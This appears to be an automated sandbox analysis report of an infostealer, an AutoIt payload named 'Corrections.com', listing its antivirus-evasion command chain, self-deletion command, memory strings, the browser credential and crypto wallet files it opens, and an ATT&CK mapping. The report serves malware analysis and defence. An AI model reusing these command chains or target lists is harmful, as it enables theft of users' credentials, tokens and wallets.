            Source: Corrections.com, 0000000A.00000002.2823074845.0000000004D99000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVMware
            Source: Corrections.com, 0000000A.00000003.1925513732.0000000004431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 12.1960009dd8757fc4c7a65dceef295f6e0INSERT_KEY_HEREGetProcALoadLibrlstrcatAOpenEvenCreateEvCloseHanVirtualAllocExNuVirtualFGetSysteVirtualAHeapAlloGetComputerNameAlstrcpyAGetProceGetCurrentProceslstrlenAExitProcSystemTimeToFileadvapi32gdi32.dluser32.dcrypt32.ntdll.dlGetUserNCreateDCGetDevicReleaseDVMwareVMJohnDoe%hu/%hu/GetEnvironmentVariableAGetFileAttributeGlobalLoHeapFreeGetFileSGlobalSiIsWow64PProcess3GetLocalFreeLibrGetTimeZoneInforGetSystemPowerStGetWindowsDirectGetModuleFileNamDeleteFiFindNextLocalFreFindClosSetEnvironmentVaLocalAllReadFileSetFilePWriteFilCreateFiFindFirsCopyFileVirtualPGetLastElstrcpynMultiByteToWideCGlobalFrWideCharToMultiBGlobalAlOpenProcTerminateProcessgdiplus.ole32.dlbcrypt.dwininet.shlwapi.shell32.psapi.dlrstrtmgrCreateCompatibleSelectObDeleteObGdiplusSGdiplusShutdownGdipSaveImageToSGdipDisposeImageGdipFreeGetHGlobalFromStCreateStreamOnHGCoUninitCoInitiaCoCreateInstanceBCryptDeBCryptSetPropertBCryptDestroyKeyGetWindoGetDesktopWindowCloseWinwsprintfEnumDisplayDevicGetKeyboardLayouCharToOeRegQueryValueExARegEnumKRegOpenKRegCloseRegEnumVCryptBinaryToStrSHGetFolderPathAShellExecuteExAInternetOpenUrlAInternetConnectAInternetCloseHanInternetHttpSendRequestAHttpOpenRequestAInternetReadFileInternetCrackUrlStrCmpCAStrStrAStrCmpCWPathMatcRmStartSRmRegisterResourRmGetLisRmEndSessqlite3_sqlite3_prepare_sqlite3_column_tsqlite3_finalizesqlite3_column_bencrypteNSS_InitNSS_ShutPK11_GetInternalKeySlotPK11_FrePK11_AuthenticatPK11SDR_DecryptC:\ProgramData\profile:Login: PasswordOperaGXNetworkCookiesAutofillHistoryMonth: Login DaWeb Datalogins.jformSubmusernameencryptedUsernamencryptedPassworcookies.places.sPluginsSync Extension SettingsIndexedDOpera StOpera GX StableCURRENTchrome-extension_0.indexeddb.levLocal StprofilesfirefoxWallets%08lX%04ProductN%d/%d/%d %d:%d:%DisplayNDisplayVfreebl3.mozglue.msvcp140nss3.dllsoftokn3vcruntime140.dll/c start%DESKTOP%APPDATA%LOCALAP%USERPRO%DOCUMEN%PROGRAM%PROGRAMFILES_86%RECENT%\discord\Local Storage\l\Telegram Desktokey_dataD877F783D5D3EF8CA7FDF864FBC10B77A92DAA6EA6F891F2F8806DD0C461824FTelegram\.purpleaccountsdQw4w9Wgtoken: Software\Valve\SSteamPat\config\config.vDialogConfig.vdflibraryfolders.vloginuse\Steam\sqlite3.browsers\Discord\tokens.HTTP/1.1file_nammessagescreensh
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0099F4FF BlockInput,10_2_0099F4FF
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0092338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_0092338B
            Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00945058 mov eax, dword ptr fs:[00000030h]10_2_00945058
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_009820AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,10_2_009820AA
            Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00952992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00952992
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00940BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00940BAF
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00940D45 SetUnhandledExceptionFilter,10_2_00940D45
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00940F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00940F91
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00981B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00981B4D
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0092338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_0092338B
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0098BBED SendInput,keybd_event,10_2_0098BBED
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0098EC9E mouse_event,10_2_0098EC9E
            Source: C:\Users\user\Desktop\lem.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmdJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 628056Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Cleared" Penalties Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Participating + ..\Produced + ..\Tvs + ..\Contractor + ..\Legislative uJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Corrections.com uJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\628056\Corrections.com" & rd /s /q "C:\ProgramData\2N7Y58YCJW47" & exitJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_009814AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_009814AE
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00981FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00981FB0
            Source: Corrections.com, 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmp, Corrections.com.1.dr, Appeals.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: Corrections.comBinary or memory string: Shell_TrayWnd
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00940A08 cpuid 10_2_00940A08
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0097E5F4 GetLocalTime,10_2_0097E5F4
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0097E652 GetUserNameW,10_2_0097E652
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0095BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,10_2_0095BCD2
            Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: Process Memory Space: Corrections.com PID: 5496, type: MEMORYSTR
            Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Electrum
            Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
            Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
            Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
            Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Exodus\
            Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: info.seco
            Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
            Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: passphrase.json
            Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
            Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Exodus
            Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Ethereum
            Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
            Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
            Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: MultiDoge
            Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: seed.seco
            Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
            Source: Corrections.com, 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
            Source: Corrections.comBinary or memory string: WIN_81
            Source: Corrections.comBinary or memory string: WIN_XP
            Source: Appeals.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: Corrections.comBinary or memory string: WIN_XPe
            Source: Corrections.comBinary or memory string: WIN_VISTA
            Source: Corrections.comBinary or memory string: WIN_7
            Source: Corrections.comBinary or memory string: WIN_8
            Source: Yara matchFile source: 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.2823074845.0000000004D99000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Corrections.com PID: 5496, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: Process Memory Space: Corrections.com PID: 5496, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_009A2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_009A2263
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_009A1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,10_2_009A1C61
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            11
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            2
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API
            2
            Valid Accounts
            1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol4
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Extra Window Memory Injection
            2
            Obfuscated Files or Information
            Security Account Manager3
            File and Directory Discovery
            SMB/Windows Admin Shares21
            Input Capture
            1
            Remote Access Software
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            1
            DLL Side-Loading
            NTDS27
            System Information Discovery
            Distributed Component Object Model3
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            Extra Window Memory Injection
            LSA Secrets231
            Security Software Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
